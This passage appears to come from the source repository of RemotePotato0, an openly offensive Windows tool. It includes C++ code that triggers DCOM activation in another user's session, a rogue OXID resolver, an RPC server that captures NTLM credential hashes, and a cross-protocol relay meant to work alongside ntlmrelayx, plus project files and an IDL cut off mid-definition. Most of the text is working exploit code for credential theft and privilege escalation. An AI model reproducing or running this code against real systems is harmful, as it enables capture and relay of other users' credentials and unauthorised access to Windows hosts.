TCP:{{ThisMachineIp}}:%S\n", rogueOxidResolverPort); 151 | juicyPotatoCompatible = false; 152 | } 153 | } 154 | else { 155 | // using the system oxid resolver to forge rpc packet template 156 | threads_params.rpcServerIpReflection = (wchar_t*)L"127.0.0.1"; 157 | threads_params.rpcServerPortReflection = (wchar_t*)L"135"; 158 | } 159 | 160 | if (fModule == 0 || fModule == 1) { 161 | if (remoteHTTPRelayServerIp == NULL) 162 | { 163 | printf("[!] Remote HTTP Relay server ip must be set in module 0 and 1, set it with the -r flag.\n"); 164 | exit(-1); 165 | } 166 | printf("[*] Starting the NTLM relay attack, launch ntlmrelayx on %S!!\n", remoteHTTPRelayServerIp); 167 | hThreadServer = CreateThread(NULL, 0, ThreadHTTPCrossProtocolRelay, (LPVOID)& threads_params, 0, NULL); 168 | } 169 | else { 170 | printf("[*] Starting the RPC server to capture the credentials hash from the user authentication!!\n"); 171 | hThreadServer = CreateThread(NULL, 0, ThreadRpcServerCaptureCredsHash, (LPVOID)& threads_params, 0, NULL); 172 | } 173 | 174 | if (fModule == 0 || fModule == 2) { 175 | if (g_sessionID == -1) 176 | TriggerDCOM(clsid); 177 | else 178 | TriggerDCOMWithSessionID(clsid); 179 | } 180 | 181 | WaitForSingleObject(hThreadServer, INFINITE); 182 | return 0; 183 | } 184 | 185 | DWORD WINAPI ThreadRogueOxidResolver(LPVOID lpParam) 186 | { 187 | size_t pReturnValue; 188 | char listening_port[6]; 189 | wcstombs_s(&pReturnValue, listening_port, 5, (const wchar_t*)lpParam, 5); 190 | RunRogueOxidResolver(listening_port); 191 | return 0; 192 | } 193 | 194 | DWORD WINAPI ThreadRpcServerCaptureCredsHash(LPVOID lpParam) { 195 | THREAD_PARAMETERS* thread_params = (THREAD_PARAMETERS*)lpParam; 196 | DoRpcServerCaptureCredsHash(thread_params->rpcServerIpReflection, thread_params->rpcServerPortReflection, thread_params->rpcRelayServerListeningPort); 197 | return 0; 198 | } 199 | 200 | DWORD WINAPI ThreadHTTPCrossProtocolRelay(LPVOID lpParam) { 201 | THREAD_PARAMETERS* thread_params = (THREAD_PARAMETERS*)lpParam; 202 | DoHTTPCrossProtocolRelay(thread_params->remoteHTTPRelayServerIp, thread_params->remoteHTTPRelayServerPort, thread_params->rpcServerIpReflection, thread_params->rpcServerPortReflection, thread_params->rpcRelayServerListeningPort); 203 | return 0; 204 | } 205 | 206 | void TriggerDCOM(wchar_t* clsid_string) 207 | { 208 | CoInitialize(NULL); 209 | 210 | //Create IStorage object 211 | IStorage* stg = NULL; 212 | ILockBytes* lb = NULL; 213 | HRESULT res; 214 | 215 | res = CreateILockBytesOnHGlobal(NULL, TRUE, &lb); 216 | res = StgCreateDocfileOnILockBytes(lb, STGM_CREATE | STGM_READWRITE | STGM_SHARE_EXCLUSIVE, 0, &stg); 217 | 218 | //Initialze IStorageTrigger object 219 | IStorageTrigger* t = new IStorageTrigger(stg); 220 | 221 | CLSID clsid; 222 | CLSIDFromString(clsid_string, &clsid); 223 | CLSID tmp; 224 | //IUnknown IID 225 | CLSIDFromString(OLESTR("{00000000-0000-0000-C000-000000000046}"), &tmp); 226 | MULTI_QI qis[1]; 227 | qis[0].pIID = &tmp; 228 | qis[0].pItf = NULL; 229 | qis[0].hr = 0; 230 | 231 | //Call CoGetInstanceFromIStorage 232 | printf("[*] Calling CoGetInstanceFromIStorage with CLSID:%S\n", clsid_string); 233 | HRESULT status = CoGetInstanceFromIStorage(NULL, &clsid, NULL, CLSCTX_LOCAL_SERVER, t, 1, qis); 234 | if (!g_SuccessTrigger) 235 | { 236 | if (status == CO_E_BAD_PATH) 237 | printf("[!] Error. CLSID %S not found. Bad path to object.\n", clsid_string); 238 | else 239 | printf("[!] Error. Trigger DCOM failed with status: 0x%x\n", status); 240 | exit(-1); 241 | } 242 | //debug 243 | //printf("[*] CoGetInstanceFromIStorage status:0x%x\n", status); 244 | CoUninitialize(); 245 | } 246 | 247 | void TriggerDCOMWithSessionID(wchar_t* clsid_string) 248 | { 249 | CoInitialize(NULL); 250 | 251 | //Create IStorage object 252 | IStorage* stg = NULL; 253 | ILockBytes* lb = NULL; 254 | HRESULT res; 255 | 256 | res = CreateILockBytesOnHGlobal(NULL, TRUE, &lb); 257 | res = StgCreateDocfileOnILockBytes(lb, STGM_CREATE | STGM_READWRITE | STGM_SHARE_EXCLUSIVE, 0, &stg); 258 | 259 | //Initialze IStorageTrigger object 260 | IStorageTrigger* t = new IStorageTrigger(stg); 261 | 262 | CLSID clsid; 263 | CLSIDFromString(clsid_string, &clsid); 264 | CLSID tmp, CLSID_ComActivator; 265 | //IUnknown IID 266 | CLSIDFromString(OLESTR("{00000000-0000-0000-C000-000000000046}"), &tmp); 267 | //ComActivator CLSID 268 | CLSIDFromString(OLESTR("{0000033C-0000-0000-c000-000000000046}"), &CLSID_ComActivator); 269 | 270 | MULTI_QI qis[1]; 271 | qis[0].pIID = &tmp; 272 | qis[0].pItf = NULL; 273 | qis[0].hr = 0; 274 | IStandardActivator* pComAct; 275 | HRESULT r = CoCreateInstance(CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, IID_IStandardActivator, (LPVOID*)&pComAct); 276 | //printf("CoCreate=%d\n", r); 277 | ISpecialSystemProperties* pSpecialProperties = NULL; 278 | //printf("start query inter\n"); 279 | r = pComAct->QueryInterface(IID_ISpecialSystemProperties, (void**)& pSpecialProperties); 280 | //printf("query inter: %d\n", r); 281 | //printf("start set session"); 282 | r = pSpecialProperties->SetSessionId(g_sessionID, 0, 1); 283 | //printf("set session: %d\n", r); 284 | printf("[*] Spawning COM object in the session: %d\n", g_sessionID); 285 | printf("[*] Calling StandardGetInstanceFromIStorage with CLSID:%S\n", clsid_string); 286 | HRESULT status = pComAct->StandardGetInstanceFromIStorage(NULL, &clsid, NULL, CLSCTX_LOCAL_SERVER, t, 1, qis); 287 | std::string message = std::system_category().message(status); 288 | //printf("Error: %s\n", message.c_str()); 289 | //Call CoGetInstanceFromIStorage 290 | //printf("[*] Calling CoGetInstanceFromIStorage with CLSID:%S\n", clsid_string); 291 | //HRESULT status = CoGetInstanceFromIStorage(NULL, &clsid, NULL, CLSCTX_LOCAL_SERVER, t, 1, qis); 292 | if (!g_SuccessTrigger) 293 | { 294 | if (status == CO_E_BAD_PATH) 295 | printf("[!] Error. CLSID %S not found. Bad path to object.\n", clsid_string); 296 | else 297 | printf("[!] Error. Trigger DCOM failed with status: 0x%x - %s\n", status, message.c_str()); 298 | exit(-1); 299 | } 300 | //debug 301 | //printf("[*] CoGetInstanceFromIStorage status:0x%x\n", status); 302 | CoUninitialize(); 303 | } 304 | 305 | BOOL IsJuicyPotatoCompatible() { 306 | OSVERSIONINFOEX Version; 307 | memset(&Version, 0x00, sizeof(Version)); 308 | Version.dwOSVersionInfoSize = sizeof(Version); 309 | pRtlGetVersion RtlGetVersion = (pRtlGetVersion)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion"); 310 | RtlGetVersion(&Version); 311 | if (Version.dwMajorVersion <= 10 && Version.dwBuildNumber <= 17134) 312 | return true; 313 | return false; 314 | } 315 | 316 | void usage() 317 | { 318 | printf("\n\n\tRemotePotato0\n\t@splinter_code & @decoder_it\n\n\n\n"); 319 | printf("Mandatory args: \n" 320 | "-m module\n" 321 | "\tAllowed values:\n" 322 | "\t0 - Rpc2Http cross protocol relay server + potato trigger (default)\n" 323 | "\t1 - Rpc2Http cross protocol relay server\n" 324 | "\t2 - Rpc capture (hash) server + potato trigger\n" 325 | "\t3 - Rpc capture (hash) server\n" 326 | ); 327 | 328 | printf("\n\n"); 329 | printf("Other args: (someone could be mandatory and/or optional based on the module you use) \n" 330 | "-r Remote HTTP relay server ip\n" 331 | "-t Remote HTTP relay server port (Default 80)\n" 332 | "-x Rogue Oxid Resolver ip (default 127.0.0.1)\n" 333 | "-p Rogue Oxid Resolver port (default 9999)\n" 334 | "-l RPC Relay server listening port (Default 9997)\n" 335 | "-s Session id for the Cross Session Activation attack (default disabled)\n" 336 | "-c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54})\n" 337 | ); 338 | } -------------------------------------------------------------------------------- /RemotePotato0.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29230.47 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RemotePotato0", "RemotePotato0.vcxproj", "{B88B65D3-2689-4E39-892C-7532087174CB}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {B88B65D3-2689-4E39-892C-7532087174CB}.Debug|x64.ActiveCfg = Debug|x64 17 | {B88B65D3-2689-4E39-892C-7532087174CB}.Debug|x64.Build.0 = Debug|x64 18 | {B88B65D3-2689-4E39-892C-7532087174CB}.Debug|x86.ActiveCfg = Debug|Win32 19 | {B88B65D3-2689-4E39-892C-7532087174CB}.Debug|x86.Build.0 = Debug|Win32 20 | {B88B65D3-2689-4E39-892C-7532087174CB}.Release|x64.ActiveCfg = Release|x64 21 | {B88B65D3-2689-4E39-892C-7532087174CB}.Release|x64.Build.0 = Release|x64 22 | {B88B65D3-2689-4E39-892C-7532087174CB}.Release|x86.ActiveCfg = Release|Win32 23 | {B88B65D3-2689-4E39-892C-7532087174CB}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {676A99B9-A2DE-45FB-BA6A-C19D26A95EFF} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /RemotePotato0.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {B88B65D3-2689-4E39-892C-7532087174CB} 24 | Win32Proj 25 | RemotePotato0 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | true 92 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 93 | true 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | 103 | 104 | Level3 105 | Disabled 106 | true 107 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 108 | true 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | 118 | 119 | Level3 120 | MaxSpeed 121 | true 122 | true 123 | true 124 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 125 | true 126 | MultiThreaded 127 | 128 | 129 | Console 130 | true 131 | true 132 | false 133 | 134 | 135 | 136 | 137 | 138 | 139 | Level3 140 | MaxSpeed 141 | true 142 | true 143 | true 144 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 145 | true 146 | MultiThreaded 147 | 148 | 149 | Console 150 | true 151 | true 152 | false 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | -------------------------------------------------------------------------------- /RemotePotato0.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /RogueOxidResolver.cpp: -------------------------------------------------------------------------------- 1 | #include "Windows.h" 2 | #include "stdio.h" 3 | #include "RogueOxidResolver_h.h" 4 | #include "RogueOxidResolver.h" 5 | 6 | #pragma comment( lib, "Rpcrt4.lib" ) 7 | 8 | extern wchar_t* g_rpcRelayServerListeningPort; 9 | 10 | RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE hInterface, void* pBindingHandle); 11 | 12 | int RunRogueOxidResolver(char* listening_port) { 13 | RPC_STATUS status; 14 | RPC_BINDING_VECTOR* pbindingVector = 0; 15 | // Uses the protocol combined with the endpoint for receiving 16 | // remote procedure calls. 17 | const char* pszProtocolSequence = "ncacn_ip_tcp"; 18 | const char* pszEndpoint = listening_port; 19 | unsigned char* pszSecurity = NULL; 20 | unsigned int cMaxCalls = 20; 21 | 22 | status = RpcServerUseProtseqEpA((RPC_CSTR)pszProtocolSequence, cMaxCalls, (RPC_CSTR)pszEndpoint, pszSecurity); 23 | if (status) { 24 | printf("[-] RpcServerUseProtseqEp() failed with status code %d\n", status); 25 | return (-1); 26 | } 27 | 28 | status = RpcServerRegisterIf2( 29 | IObjectExporter_v0_0_s_ifspec, // Interface to register. 30 | NULL, // Use the MIDL generated entry-point vector. 31 | NULL, // Use the MIDL generated entry-point vector. 32 | RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, // Forces use of security callback. 33 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, // Use default number of concurrent calls. 34 | (unsigned)-1, // Infinite max size of incoming data blocks. 35 | SecurityCallback); // Naive security callback 36 | if (status) { 37 | printf("[-] RpcServerRegisterIf2() failed with status code %d\n", status); 38 | return (-1); 39 | } 40 | 41 | status = RpcServerInqBindings(&pbindingVector); 42 | if (status) { 43 | printf("[-] RpcServerInqBindings() failed with status code %d\n", status); 44 | return (-1); 45 | } 46 | 47 | status = RpcServerRegisterAuthInfoA((RPC_CSTR)"", 48 | RPC_C_AUTHN_WINNT, 49 | NULL, 50 | NULL); 51 | if (status) { 52 | printf("[-] RpcServerRegisterAuthInfoA() failed with status code %d\n", status); 53 | return (-1); 54 | } 55 | 56 | status = RpcEpRegisterA(IObjectExporter_v0_0_s_ifspec, 57 | pbindingVector, 58 | 0, 59 | (RPC_CSTR)"RoguePotato"); 60 | if (status) { 61 | printf("[-] RpcEpRegister() failed with status code %d\n", status); 62 | return (-1); 63 | } 64 | 65 | printf("[*] Starting RogueOxidResolver RPC Server listening on port %s ... \n", pszEndpoint); 66 | 67 | // Start to listen for remote procedure calls for all registered interfaces. 68 | // This call will not return until RpcMgmtStopServerListening is called. 69 | status = RpcServerListen( 70 | 1, // Recommended minimum number of threads. 71 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, // Recommended maximum number of threads. 72 | FALSE); // Start listening now. 73 | if (status) { 74 | printf("[-] RpcServerListen() failed with status code %d\n", status); 75 | return (-1); 76 | } 77 | return 0; 78 | } 79 | 80 | 81 | error_status_t ResolveOxid( 82 | _In_ handle_t hRpc, 83 | _In_ OXID* pOxid, 84 | _In_ unsigned short cRequestedProtseqs, 85 | _In_ unsigned short arRequestedProtseqs[], 86 | _Out_ DUALSTRINGARRAY** ppdsaOxidBindings, 87 | _Out_ IPID* pipidRemUnknown, 88 | _Out_ DWORD* pAuthnHint) 89 | { 90 | 91 | printf("[*] ResolveOxid RPC call\n"); 92 | return RPC_S_OK; 93 | } 94 | 95 | 96 | error_status_t SimplePing 97 | ( 98 | handle_t hRpc, 99 | SETID* pSetId 100 | ) 101 | { 102 | printf("[*] SimplePing RPC call\n"); 103 | 104 | return RPC_S_OK; 105 | } 106 | 107 | error_status_t ComplexPing 108 | ( 109 | handle_t hRpc, 110 | SETID* pSetId, 111 | unsigned short SequenceNum, 112 | unsigned short cAddToSet, 113 | unsigned short cDelFromSet, 114 | OID AddToSet[], 115 | OID DelFromSet[], 116 | unsigned short* pPingBackoffFactor 117 | ) 118 | { 119 | printf("[*] ComplexPing RPC call\n"); 120 | return RPC_S_OK; 121 | } 122 | 123 | error_status_t ServerAlive 124 | ( 125 | handle_t hRpc 126 | ) 127 | { 128 | printf("[*] ServerAlive RPC call\n"); 129 | return RPC_S_OK; 130 | } 131 | 132 | error_status_t ResolveOxid2 133 | ( 134 | handle_t hRpc, 135 | OXID* pOxid, 136 | unsigned short cRequestedProtseqs, 137 | unsigned short arRequestedProtseqs[], 138 | DUALSTRINGARRAY** ppdsaOxidBindings, 139 | IPID* pipidRemUnknown, 140 | DWORD* pAuthnHint, 141 | COMVERSION* pComVersion 142 | ) 143 | { 144 | size_t wcstombsOut; 145 | char endpoint[MAX_PATH]; 146 | char port[10]; 147 | memset(port, 0, 10); 148 | wcstombs_s(&wcstombsOut, port, 9, g_rpcRelayServerListeningPort, 9); 149 | 150 | printf("[*] ResolveOxid2 RPC call\n"); 151 | *pAuthnHint = RPC_C_AUTHN_LEVEL_CONNECT; 152 | CLSIDFromString(OLESTR("{11111111-2222-3333-4444-555555555555}"), (CLSID*)pipidRemUnknown); 153 | sprintf_s(endpoint, MAX_PATH, "127.0.0.1[%s]", port); 154 | int endpoint_len = (int)strlen(endpoint) + 1; 155 | char principalName[] = ""; 156 | int nEntries = (1 + endpoint_len + 1 + 2 + sizeof(principalName) + 1); 157 | int securityOffset = (1 + endpoint_len) + 1; 158 | COMVERSION outputCom; 159 | outputCom.MajorVersion = 5; 160 | outputCom.MinorVersion = 7; 161 | *pComVersion = outputCom; 162 | *ppdsaOxidBindings = (DUALSTRINGARRAY*)malloc(nEntries * sizeof(WCHAR) + sizeof(DUALSTRINGARRAY)); 163 | (*ppdsaOxidBindings)->wNumEntries = nEntries; 164 | (*ppdsaOxidBindings)->wSecurityOffset = securityOffset; 165 | //(*ppdsaOxidBindings)->aStringArray[0] = 0x0F; //ncacn_np 166 | (*ppdsaOxidBindings)->aStringArray[0] = 0x07; //ncacn_ip_tcp 167 | int z = 0; 168 | for (int i = 1; i < endpoint_len + 1; i++) { 169 | (*ppdsaOxidBindings)->aStringArray[i] = (unsigned short)endpoint[z]; 170 | z++; 171 | } 172 | (*ppdsaOxidBindings)->aStringArray[securityOffset - 1] = 0x00; // null byte separator between string bindings and security bindings 173 | (*ppdsaOxidBindings)->aStringArray[securityOffset] = RPC_C_AUTHN_WINNT;// 0x0a 174 | securityOffset++; 175 | (*ppdsaOxidBindings)->aStringArray[securityOffset] = 0xffff; 176 | securityOffset++; 177 | int j = 0; 178 | for (int i = securityOffset; i < nEntries - 1; i++) { 179 | (*ppdsaOxidBindings)->aStringArray[i] = (unsigned short)principalName[j]; 180 | j++; 181 | } 182 | (*ppdsaOxidBindings)->aStringArray[nEntries] = 0; 183 | (*ppdsaOxidBindings)->aStringArray[nEntries - 1] = 0; //some magic fix again.... 184 | return RPC_S_OK; 185 | } 186 | 187 | 188 | error_status_t ServerAlive2 189 | ( 190 | handle_t hRpc, 191 | COMVERSION* pComVersion, 192 | DUALSTRINGARRAY** ppdsaOrBindings, 193 | DWORD* pReserved 194 | ) { 195 | printf("[*] ServerAlive2 RPC Call\n"); 196 | return RPC_S_OK; 197 | } 198 | 199 | RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE hInterface, void* pBindingHandle) 200 | { 201 | return RPC_S_OK; // Always allow anyone. 202 | } 203 | 204 | // Memory allocation function for RPC. 205 | // The runtime uses these two functions for allocating/deallocating 206 | // enough memory to pass the string to the server. 207 | void* __RPC_USER midl_user_allocate(size_t size) 208 | { 209 | return malloc(size); 210 | } 211 | 212 | // Memory deallocation function for RPC. 213 | void __RPC_USER midl_user_free(void* p) 214 | { 215 | free(p); 216 | } 217 | -------------------------------------------------------------------------------- /RogueOxidResolver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | int RunRogueOxidResolver(char*); -------------------------------------------------------------------------------- /RogueOxidResolver.idl: -------------------------------------------------------------------------------- 1 | import "oaidl.idl"; 2 | import "ocidl.idl"; 3 | 4 | //source --> https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/49aef5a4-f0ad-4478-abb5-cb9446dc13c6 5 | 6 | typedef GUID CLSID; 7 | typedef GUID IID; 8 | typedef unsigned hyper ID; 9 | typedef unsigned hyper OXID; 10 | 11 | typedef unsigned hyper OID; 12 | typedef unsigned hyper SETID; 13 | typedef GUID IPID; 14 | typedef GUID CID; 15 | 16 | #define REFGUID const GUID * 17 | #define REFIID const IID * 18 | 19 | typedef REFGUID REFIPID; 20 | 21 | const unsigned long MAX_REQUESTED_INTERFACES = 0x8000; 22 | const unsigned long MAX_REQUESTED_PROTSEQS = 0x8000; 23 | 24 | typedef struct tagCOMVERSION 25 | { 26 | unsigned short MajorVersion; 27 | unsigned short MinorVersion; 28 | } COMVERSION; 29 | 30 | typedef struct tagORPC_EXTENT 31 | { 32 | GUID id; 33 | unsigned long size; 34 | [size_is((size + 7) & ~7)] byte data[]; 35 | } ORPC_EXTENT; 36 | 37 | typedef struct tagORPC_EXTENT_ARRAY 38 | { 39 | unsigned long size; 40 | unsigned long reserved; 41 | [size_is((size + 1) & ~1, ), unique] ORPC_EXTENT** extent; 42 | } ORPC_EXTENT_ARRAY; 43 | 44 | typedef struct tagORPCTHIS 45 | { 46 | COMVERSION version; 47 | unsigned long flags; 48 | unsigned long reserved1; 49 | CID cid; 50 | [unique] ORPC_EXTENT_ARRAY* extensions; 51 | } ORPCTHIS; 52 | 53 | typedef struct tagORPCTHAT 54 | { 55 | unsigned long flags; 56 | [unique] ORPC_EXTENT_ARRAY* extensions; 57 | } ORPCTHAT; 58 | 59 | typedef struct tagDUALSTRINGARRAY 60 | { 61 | unsigned short wNumEntries; 62 | unsigned short wSecurityOffset; 63 | [size_is(wNumEntries)] unsigned short aStringArray[]; 64 | } DUALSTRINGARRAY; 65 | 66 | enum tagCPFLAGS 67 | { 68 | CPFLAG_PROPAGATE = 0x1, 69 | CPFLAG_EXPOSE = 0x2, 70 | CPFLAG_ENVOY = 0x4, 71 | }; 72 | 73 | typedef struct tagMInterfacePointer 74 | { 75 | unsigned long ulCntData; 76 | [size_is(ulCntData)] byte abData[]; 77 | } MInterfacePointer; 78 | 79 | typedef [unique] MInterfacePointer* PMInterfacePointer; 80 | 81 | typedef struct tagErrorObjectData 82 | { 83 | DWORD dwVersion; 84 | DWORD dwHelpContext; 85 | IID iid; 86 | [unique, string] wchar_t* pszSource; 87 | [unique, string] wchar_t* pszDescription; 88 | [unique, string] wchar_t* pszHelpFile; 89 | } ErrorObjectData; 90 | 91 | 92 | [ 93 | uuid(99fcfec4-5260-101b-bbcb-00aa0021347a), 94 | pointer_default(unique) 95 | ] 96 | 97 | interface IObjectExporter 98 | { 99 | [idempotent] error_status_t ResolveOxid 100 | ( 101 | [in] handle_t hRpc, 102 | [in] OXID* pOxid, 103 | [in] unsigned short cRequestedProtseqs, 104 | [in, ref, size_is(cRequestedProtseqs)] 105 | unsigned short arRequestedProtseqs[], 106 | [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings, 107 | [out, ref] IPID* pipidRemUnknown, 108 | [out, ref] DWORD* pAuthnHint 109 | ); 110 | 111 | [idempotent] error_status_t SimplePing 112 | ( 113 | [in] handle_t hRpc, 114 | [in] SETID* pSetId 115 | ); 116 | 117 | [idempotent] error_status_t ComplexPing 118 | ( 119 | [in] handle_t hRpc, 120 | [in, out] SETID* pSetId, 121 | [in] unsigned short SequenceNum, 122 | [in] unsigned short cAddToSet, 123 | [in] unsigned short cDelFromSet, 124 | [in, unique, size_is(cAddToSet)] OID AddToSet[], 125 | [in, unique, size_is(cDelFromSet)] OID DelFromSet[], 126 | [out] unsigned short* pPingBackoffFactor 127 | ); 128 | 129 | [idempotent] error_status_t ServerAlive 130 | ( 131 | [in] handle_t hRpc 132 | ); 133 | 134 | 135 | [idempotent] error_status_t ResolveOxid2 136 | ( 137 | [in] handle_t hRpc, 138 | [in] OXID* pOxid, 139 | [in] unsigned short cRequestedProtseqs, 140 | [in, ref, size_is(cRequestedProtseqs)] 141 | unsigned short arRequestedProtseqs[], 142 | [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings, 143 | [out, ref] IPID* pipidRemUnknown, 144 | [out, ref] DWORD* pAuthnHint, 145 | [out, ref] COMVERSION* pComVersion 146 | ); 147 | 148 | [idempotent] error_status_t ServerAlive2 149 | ( 150 | [in] handle_t hRpc, 151 | [out, ref] COMVERSION* pComVersion, 152 | [out, ref] DUALSTRINGARRAY** ppdsaOrBindings, 153 | [out, ref] DWORD* pReserved 154 | ); 155 | } 156 | 157 | typedef struct tagSTDOBJREF 158 | { 159 | unsigned long flags; 160 | unsigned long cPublicRefs; 161 | OXID oxid; 162 | OID oid; 163 | IPID ipid; 164 | } STDOBJREF; 165 | 166 | typedef struct tagREMQIRESULT 167 | { 168 | HRESULT hResult; 169 | STDOBJREF std; 170 | } REMQIRESULT; 171 | 172 | typedef struct tagREMINTERFACEREF 173 | { 174 | IPID ipid; 175 | unsigned long cPublicRefs; 176 | unsigned long cPrivateRefs; 177 | } REMINTERFACEREF; 178 | 179 | typedef [disable_consistency_check] REMQIRESULT* PREMQIRESULT; 180 | typedef [disable_consistency_check] MInterfacePointer* 181 | PMInterfacePointerInternal; 182 | 183 | /*Already defined 184 | [ 185 | object, 186 | uuid(00000000-0000-0000-C000-000000000046), 187 | pointer_default(unique) 188 | ] 189 | interface IUnknown 190 | { 191 | HRESULT Opnum0NotUsedOnWire(void); 192 | HRESULT Opnum1NotUsedOnWire(void); 193 | HRESULT Opnum2NotUsedOnWire(void); 194 | };*/ 195 | 196 | [ 197 | object, 198 | uuid(00000131-0000-0000-C000-000000000046) 199 | ] 200 | interface IRemUnknown : IUnknown 201 | { 202 | HRESULT RemQueryInterface 203 | ( 204 | [in] REFIPID ripid, 205 | [in] unsigned long cRefs, 206 | [in] unsigned short cIids, 207 | [in, size_is(cIids)] IID* iids, 208 | [out, size_is(, cIids)] PREMQIRESULT* ppQIResults 209 | ); 210 | 211 | HRESULT RemAddRef 212 | ( 213 | [in] unsigned short cInterfaceRefs, 214 | [in, size_is(cInterfaceRefs)] REMINTERFACEREF 215 | InterfaceRefs[], 216 | [out, size_is(cInterfaceRefs)] HRESULT* pResults 217 | ); 218 | 219 | HRESULT RemRelease 220 | ( 221 | [in] unsigned short cInterfaceRefs, 222 | [in, size_is(cInterfaceRefs)] REMINTERFACEREF 223 | InterfaceRefs[] 224 | ); 225 | } 226 | 227 | [ 228 | object, 229 | uuid(00000143-0000-0000-C000-000000000046) 230 | ] 231 | interface IRemUnknown2 : IRemUnknown 232 | { 233 | HRESULT RemQueryInterface2 234 | ( 235 | [in] REFIPID ripid, 236 | [in] unsigned short cIids, 237 | [in, size_is(cIids)] IID* iids, 238 | [out, size_is(cIids)] HRESULT* phr, 239 | [out, size_is(cIids)] PMInterfacePointerInternal* ppMIF 240 | ); 241 | } 242 | 243 | const unsigned long MIN_ACTPROP_LIMIT = 1; 244 | const unsigned long MAX_ACTPROP_LIMIT = 10; 245 | 246 | /*Already defined 247 | typedef struct _COSERVERINFO 248 | { 249 | DWORD dwReserved1; 250 | [string] wchar_t* pwszName; 251 | DWORD* pdwReserved; 252 | DWORD dwReserved2; 253 | } COSERVERINFO;*/ 254 | 255 | typedef struct _customREMOTE_REQUEST_SCM_INFO 256 | { 257 | DWORD ClientImpLevel; 258 | [range(0, MAX_REQUESTED_PROTSEQS)] unsigned short 259 | cRequestedProtseqs; 260 | [size_is(cRequestedProtseqs)] 261 | unsigned short* pRequestedProtseqs; 262 | } customREMOTE_REQUEST_SCM_INFO; 263 | 264 | typedef struct _customREMOTE_REPLY_SCM_INFO 265 | { 266 | OXID Oxid; 267 | DUALSTRINGARRAY* pdsaOxidBindings; 268 | IPID ipidRemUnknown; 269 | DWORD authnHint; 270 | COMVERSION serverVersion; 271 | } customREMOTE_REPLY_SCM_INFO; 272 | 273 | typedef struct tagInstantiationInfoData 274 | { 275 | CLSID classId; 276 | DWORD classCtx; 277 | DWORD actvflags; 278 | long fIsSurrogate; 279 | [range(1, MAX_REQUESTED_INTERFACES)] DWORD cIID; 280 | DWORD instFlag; 281 | [size_is(cIID)] IID* pIID; 282 | DWORD thisSize; 283 | COMVERSION clientCOMVersion; 284 | } InstantiationInfoData; 285 | 286 | typedef struct tagLocationInfoData 287 | { 288 | [string] wchar_t* machineName; 289 | DWORD processId; 290 | DWORD apartmentId; 291 | DWORD contextId; 292 | } LocationInfoData; 293 | 294 | typedef struct tagActivationContextInfoData 295 | { 296 | long clientOK; 297 | long bReserved1; 298 | DWORD dwReserved1; 299 | DWORD dwReserved2; 300 | MInterfacePointer* pIFDClientCtx; 301 | MInterfacePointer* pIFDPrototypeCtx; 302 | } ActivationContextInfoData; 303 | 304 | typedef struct tagCustomHeader 305 | { 306 | DWORD totalSize; 307 | DWORD headerSize; 308 | DWORD dwReserved; 309 | DWORD destCtx; 310 | [range(MIN_ACTPROP_LIMIT, MAX_ACTPROP_LIMIT)] DWORD cIfs; 311 | CLSID classInfoClsid; 312 | [size_is(cIfs)] CLSID* pclsid; 313 | [size_is(cIfs)] DWORD* pSizes; 314 | DWORD* pdwReserved; 315 | } CustomHeader; 316 | 317 | typedef struct tagPropsOutInfo 318 | { 319 | [range(1, 